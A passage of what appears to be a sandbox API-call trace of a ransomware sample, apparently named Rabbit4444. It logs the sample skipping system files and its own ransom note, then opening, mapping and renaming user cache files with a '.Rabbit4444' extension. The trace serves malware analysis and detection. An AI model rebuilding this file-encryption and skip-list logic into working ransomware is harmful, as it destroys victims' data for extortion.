(lpString1="{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}", lpString2="ids.txt") returned -1 [0068.370] lstrcmpiW (lpString1="{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}", lpString2="NTUSER.DAT") returned -1 [0068.370] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}" | out: lpString1="{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}") returned="{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}" [0068.370] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}", dwFileAttributes=0x0) returned 1 [0068.370] lstrlenW (lpString="{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}") returned 38 [0068.370] lstrlenW (lpString="Rabbit4444") returned 10 [0068.371] lstrcmpiW (lpString1="02B3FA8CE}", lpString2="Rabbit4444") returned -1 [0068.371] lstrlenW (lpString=".dll") returned 4 [0068.371] lstrcmpiW (lpString1="8CE}", lpString2=".dll") returned 1 [0068.371] lstrlenW (lpString=".lnk") returned 4 [0068.371] lstrcmpiW (lpString1="8CE}", lpString2=".lnk") returned 1 [0068.371] lstrlenW (lpString=".ini") returned 4 [0068.371] lstrcmpiW (lpString1="8CE}", lpString2=".ini") returned 1 [0068.371] lstrlenW (lpString=".sys") returned 4 [0068.371] lstrcmpiW (lpString1="8CE}", lpString2=".sys") returned 1 [0068.371] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{c6d1db9a-a97a-4235-a8b7-edc02b3fa8ce}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.371] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.371] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15968193398) returned 1 [0068.371] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.371] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0068.371] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0068.371] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.372] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.373] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.373] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0068.373] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.373] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0068.373] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.374] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0068.374] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.374] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0068.374] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15968460801) returned 1 [0068.374] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0068.374] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0068.374] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.374] CloseHandle (hObject=0x29c) returned 1 [0068.374] CloseHandle (hObject=0x280) returned 1 [0068.374] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}.Rabbit4444") returned 156 [0068.374] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{c6d1db9a-a97a-4235-a8b7-edc02b3fa8ce}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C6D1DB9A-A97A-4235-A8B7-EDC02B3FA8CE}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{c6d1db9a-a97a-4235-a8b7-edc02b3fa8ce}.rabbit4444"), dwFlags=0x1) returned 1 [0068.375] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c67e0c0, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9c67e0c0, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}", cAlternateFileName="{C9F8E~1")) returned 1 [0068.375] lstrcmpiW (lpString1="{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.375] lstrcmpiW (lpString1="{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.375] lstrcmpiW (lpString1="{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}", lpString2="Rabbit4444.exe") returned -1 [0068.375] lstrcmpiW (lpString1="{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}", lpString2=".") returned 1 [0068.375] lstrcmpiW (lpString1="{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}", lpString2="..") returned 1 [0068.375] lstrcmpiW (lpString1="{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}", lpString2="windows") returned -1 [0068.375] lstrcmpiW (lpString1="{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}", lpString2="bootmgr") returned -1 [0068.375] lstrcmpiW (lpString1="{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}", lpString2="pagefile.sys") returned -1 [0068.375] lstrcmpiW (lpString1="{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}", lpString2="boot") returned -1 [0068.375] lstrcmpiW (lpString1="{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}", lpString2="ids.txt") returned -1 [0068.375] lstrcmpiW (lpString1="{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}", lpString2="NTUSER.DAT") returned -1 [0068.375] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}" | out: lpString1="{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}") returned="{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}" [0068.375] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}", dwFileAttributes=0x0) returned 1 [0068.376] lstrlenW (lpString="{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}") returned 38 [0068.376] lstrlenW (lpString="Rabbit4444") returned 10 [0068.376] lstrcmpiW (lpString1="4A25945B1}", lpString2="Rabbit4444") returned -1 [0068.376] lstrlenW (lpString=".dll") returned 4 [0068.376] lstrcmpiW (lpString1="5B1}", lpString2=".dll") returned 1 [0068.376] lstrlenW (lpString=".lnk") returned 4 [0068.376] lstrcmpiW (lpString1="5B1}", lpString2=".lnk") returned 1 [0068.376] lstrlenW (lpString=".ini") returned 4 [0068.376] lstrcmpiW (lpString1="5B1}", lpString2=".ini") returned 1 [0068.376] lstrlenW (lpString=".sys") returned 4 [0068.376] lstrcmpiW (lpString1="5B1}", lpString2=".sys") returned 1 [0068.376] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{c9f8ee44-9323-44c4-9cc8-08b4a25945b1}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.377] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.377] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15968748325) returned 1 [0068.377] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.377] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0068.377] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0068.377] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.378] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.379] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.379] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0068.379] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.379] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0068.379] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.379] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0068.379] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.379] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0068.379] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15969010714) returned 1 [0068.379] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0068.379] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0068.379] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.380] CloseHandle (hObject=0x29c) returned 1 [0068.380] CloseHandle (hObject=0x280) returned 1 [0068.380] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}.Rabbit4444") returned 156 [0068.380] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{c9f8ee44-9323-44c4-9cc8-08b4a25945b1}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{C9F8EE44-9323-44C4-9CC8-08B4A25945B1}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{c9f8ee44-9323-44c4-9cc8-08b4a25945b1}.rabbit4444"), dwFlags=0x1) returned 1 [0068.384] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cd356a6, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9cd356a6, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x453492ab, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{CB298749-48A1-4798-9A9A-8B43AB5322B0}", cAlternateFileName="{CB298~1")) returned 1 [0068.384] lstrcmpiW (lpString1="{CB298749-48A1-4798-9A9A-8B43AB5322B0}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.384] lstrcmpiW (lpString1="{CB298749-48A1-4798-9A9A-8B43AB5322B0}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.384] lstrcmpiW (lpString1="{CB298749-48A1-4798-9A9A-8B43AB5322B0}", lpString2="Rabbit4444.exe") returned -1 [0068.384] lstrcmpiW (lpString1="{CB298749-48A1-4798-9A9A-8B43AB5322B0}", lpString2=".") returned 1 [0068.384] lstrcmpiW (lpString1="{CB298749-48A1-4798-9A9A-8B43AB5322B0}", lpString2="..") returned 1 [0068.384] lstrcmpiW (lpString1="{CB298749-48A1-4798-9A9A-8B43AB5322B0}", lpString2="windows") returned -1 [0068.384] lstrcmpiW (lpString1="{CB298749-48A1-4798-9A9A-8B43AB5322B0}", lpString2="bootmgr") returned -1 [0068.384] lstrcmpiW (lpString1="{CB298749-48A1-4798-9A9A-8B43AB5322B0}", lpString2="pagefile.sys") returned -1 [0068.384] lstrcmpiW (lpString1="{CB298749-48A1-4798-9A9A-8B43AB5322B0}", lpString2="boot") returned -1 [0068.384] lstrcmpiW (lpString1="{CB298749-48A1-4798-9A9A-8B43AB5322B0}", lpString2="ids.txt") returned -1 [0068.384] lstrcmpiW (lpString1="{CB298749-48A1-4798-9A9A-8B43AB5322B0}", lpString2="NTUSER.DAT") returned -1 [0068.384] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{CB298749-48A1-4798-9A9A-8B43AB5322B0}" | out: lpString1="{CB298749-48A1-4798-9A9A-8B43AB5322B0}") returned="{CB298749-48A1-4798-9A9A-8B43AB5322B0}" [0068.384] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CB298749-48A1-4798-9A9A-8B43AB5322B0}", dwFileAttributes=0x0) returned 1 [0068.385] lstrlenW (lpString="{CB298749-48A1-4798-9A9A-8B43AB5322B0}") returned 38 [0068.385] lstrlenW (lpString="Rabbit4444") returned 10 [0068.385] lstrcmpiW (lpString1="3AB5322B0}", lpString2="Rabbit4444") returned -1 [0068.385] lstrlenW (lpString=".dll") returned 4 [0068.385] lstrcmpiW (lpString1="2B0}", lpString2=".dll") returned 1 [0068.385] lstrlenW (lpString=".lnk") returned 4 [0068.385] lstrcmpiW (lpString1="2B0}", lpString2=".lnk") returned 1 [0068.385] lstrlenW (lpString=".ini") returned 4 [0068.385] lstrcmpiW (lpString1="2B0}", lpString2=".ini") returned 1 [0068.385] lstrlenW (lpString=".sys") returned 4 [0068.385] lstrcmpiW (lpString1="2B0}", lpString2=".sys") returned 1 [0068.385] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CB298749-48A1-4798-9A9A-8B43AB5322B0}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{cb298749-48a1-4798-9a9a-8b43ab5322b0}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.386] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.386] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15969656341) returned 1 [0068.386] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.386] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0068.386] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0068.386] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.389] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0068.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0068.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0068.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0068.390] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15970082746) returned 1 [0068.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0068.390] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0068.390] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.390] CloseHandle (hObject=0x29c) returned 1 [0068.390] CloseHandle (hObject=0x280) returned 1 [0068.390] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CB298749-48A1-4798-9A9A-8B43AB5322B0}.Rabbit4444") returned 156 [0068.390] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CB298749-48A1-4798-9A9A-8B43AB5322B0}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{cb298749-48a1-4798-9a9a-8b43ab5322b0}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CB298749-48A1-4798-9A9A-8B43AB5322B0}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{cb298749-48a1-4798-9a9a-8b43ab5322b0}.rabbit4444"), dwFlags=0x1) returned 1 [0068.391] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b5f3b66, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9b5f3b66, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4523e3ac, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}", cAlternateFileName="{CBF5E~1")) returned 1 [0068.391] lstrcmpiW (lpString1="{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0068.391] lstrcmpiW (lpString1="{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0068.391] lstrcmpiW (lpString1="{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}", lpString2="Rabbit4444.exe") returned -1 [0068.391] lstrcmpiW (lpString1="{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}", lpString2=".") returned 1 [0068.391] lstrcmpiW (lpString1="{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}", lpString2="..") returned 1 [0068.391] lstrcmpiW (lpString1="{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}", lpString2="windows") returned -1 [0068.391] lstrcmpiW (lpString1="{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}", lpString2="bootmgr") returned -1 [0068.391] lstrcmpiW (lpString1="{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}", lpString2="pagefile.sys") returned -1 [0068.391] lstrcmpiW (lpString1="{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}", lpString2="boot") returned -1 [0068.391] lstrcmpiW (lpString1="{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}", lpString2="ids.txt") returned -1 [0068.392] lstrcmpiW (lpString1="{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}", lpString2="NTUSER.DAT") returned -1 [0068.392] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}" | out: lpString1="{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}") returned="{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}" [0068.392] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}", dwFileAttributes=0x0) returned 1 [0068.392] lstrlenW (lpString="{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}") returned 38 [0068.392] lstrlenW (lpString="Rabbit4444") returned 10 [0068.392] lstrcmpiW (lpString1="7BBF74C0C}", lpString2="Rabbit4444") returned -1 [0068.392] lstrlenW (lpString=".dll") returned 4 [0068.392] lstrcmpiW (lpString1="C0C}", lpString2=".dll") returned 1 [0068.392] lstrlenW (lpString=".lnk") returned 4 [0068.392] lstrcmpiW (lpString1="C0C}", lpString2=".lnk") returned 1 [0068.392] lstrlenW (lpString=".ini") returned 4 [0068.392] lstrcmpiW (lpString1="C0C}", lpString2=".ini") returned 1 [0068.392] lstrlenW (lpString=".sys") returned 4 [0068.392] lstrcmpiW (lpString1="C0C}", lpString2=".sys") returned 1 [0068.392] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{cbf5e617-6ef4-410e-8402-bdb7bbf74c0c}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0068.393] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0068.393] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15970336804) returned 1 [0068.393] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0068.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0068.393] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101e20 [0068.393] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0068.394] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0068.395] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0068.395] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0068.395] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0068.395] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0068.395] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0068.395] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0068.395] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0068.395] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0068.395] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15970603550) returned 1 [0068.395] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0068.395] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0068.395] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0068.396] CloseHandle (hObject=0x29c) returned 1 [0068.396] CloseHandle (hObject=0x280) returned 1 [0068.396] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}.Rabbit4444") returned 156 [0068.396] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{CBF5E617-6EF4-410E-8402-BDB7BBF74C0C}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{cbf5e617-6ef4-410e-8402-bdb7bbf74c0c}"), 